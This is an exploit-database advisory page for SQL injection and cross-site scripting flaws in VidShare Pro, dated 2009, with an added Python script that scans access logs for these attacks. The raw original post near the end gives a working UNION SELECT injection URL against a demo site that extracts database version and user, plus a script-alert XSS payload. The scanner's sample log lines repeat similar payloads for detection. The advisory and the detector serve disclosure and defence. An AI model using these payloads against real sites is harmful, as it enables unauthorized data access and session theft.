Vendor: VidShare Pro
By: Snakespc
CVSS: 9,3 (HIGH)
SQL Injection and XSS
CWE: 89 (SQL Injection) and 79 (XSS)
Product Name: VidShare Pro
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

VidShare Pro MULTIPLE REMOTE VULNERABILITIES

VidShare Pro is prone to multiple remote vulnerabilities, including SQL injection and cross-site scripting. An attacker can exploit these issues to manipulate SQL queries, access or modify data, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Users should never follow links from untrusted sources and should always use the latest version of all software.
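
A log-review check for the two request patterns this advisory describes, as an added example that is not part of the original page or the vendor's code. It assumes `catid` is meant to be a numeric ID; the log lines, the `search.php` path and the `q` parameter are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample access-log lines; search.php and q are hypothetical names.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/May/2009:10:00:01 +0000] "GET /listing_video.php?catid=2 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [19/May/2009:10:00:07 +0000] "GET /listing_video.php?catid=2+UNION%20SELECT%201,2,3-- HTTP/1.1" 200 6011',
    '203.0.113.9 - - [19/May/2009:10:01:12 +0000] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2310',
    '198.51.100.4 - - [19/May/2009:10:02:30 +0000] "GET /listing_video.php?catid=abc HTTP/1.1" 200 900',
    '198.51.100.4 - - [19/May/2009:10:03:02 +0000] "GET /search.php?q=%253Cb%253E HTTP/1.1" 200 880',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)

def fully_decode(value, rounds=3):
    """Undo repeated URL-encoding so %253C and %3C both end up as '<'."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the findings for one access-log line (empty list if clean)."""
    match = REQUEST.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    findings = []
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        value = fully_decode(raw)
        if url.path.endswith("/listing_video.php") and name == "catid":
            if UNION_SELECT.search(value):
                findings.append("catid: UNION SELECT")
            elif not re.fullmatch(r"\d+", value):
                findings.append("catid: not an integer")
        if "<" in value or ">" in value:
            findings.append(f"{name}: markup characters")
    return findings

def scan(lines):
    """Map 1-based line numbers to findings, skipping clean lines."""
    return {i: f for i, line in enumerate(lines, 1) if (f := classify(line))}

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG).items():
        print(lineno, findings)
```

The same integer check on `catid` and the same treatment of `<` and `>` belong in the application itself, as input validation with a parameterized query and as output encoding of the search term.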

Exploit-DB raw data:

-------------------------AllaH AkbaR-------------------------------
VidShare Pro MULTIPLE REMOTE VULNERABILITIES	
---------------------------------------------------------------------------
Discovered By: Snakespc     ALGERIAN HaCkEr 
Mail: snakespc@gmail.com
Site:http://www.snakespc.com/sc/index.php
Chi3arona houa :  Serra7 merra7 , koulchi mderra7>>>>
             Aflawa Kamikaz Wa4rin Fi kol Bla4s 
-------------------------SNAKES TEAM-------------------------------------

Script:VidShare Pro   www.omnisoftsol.com

Demo:http://www.omnisoftsol.com/index.php?option=com_content&task=view&id=7&Itemid=28

(listing_video.php)
--------------------------SNAKES TEAM------------------------------------
Exploit:SQL
--------
Demo:
http://demo.omnisoftsol.com/listing_video.php?catid=2+UNION%20SELECT%201,2,3,4,CHAR(83,%20110,%2097,%20107,%20101,%20115,%2084,%20101,%2097,%2077),6,7,8,9,10,11,concat(@@version,0x3a,user(),0x3a,database()),13,14,15,16,17,18--

(XSS)<----Search form---->

<script>alert(1954)</script>
-------------------------SNAKES TEAM-------------------------------------
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::
Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::
THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: Dr-HTmL
--------------------------SNAKES TEAM------------------------------------
ALL www.SnakespC.com/sc>>>> (  Members )
Str0ke >>>>>>>Milw0rm

# milw0rm.com [2009-05-19]